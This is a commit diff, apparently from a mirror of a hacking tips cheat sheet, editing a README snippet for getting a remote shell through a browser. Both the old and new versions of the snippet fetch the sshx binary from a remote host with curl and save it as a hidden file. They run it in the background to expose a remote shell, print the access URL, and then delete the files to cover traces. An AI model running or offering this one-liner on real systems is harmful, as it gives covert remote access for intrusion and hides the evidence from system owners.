mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-07-10 12:48:36 +02:00
Update README.md
This commit is contained in:
@@ -1621,9 +1621,8 @@ Access a remote shell from your web browser [https://sshx.io](https://sshx.io).
|
||||
```shell
|
||||
curl -SsfL https://s3.amazonaws.com/sshx/sshx-$(uname -m)-unknown-linux-musl.tar.gz|tar xfOz - sshx 2>/dev/null >.s \
|
||||
&& chmod 755 .s \
|
||||
&& (PATH=.:$PATH s -q >.url 2>/dev/null &);
|
||||
for x in {0..10}; do [ -f .url ] && break;sleep 1; done;
|
||||
cat .u;rm -rf .u .s;
|
||||
&& (PATH=.:$PATH .s -q >.u 2>/dev/null &);
|
||||
sleep 10;cat .u;rm -rf .u .s;
|
||||
```
|
||||
|
||||
Or pipe directly into memory:
|
||||
|
||||
Reference in New Issue
Block a user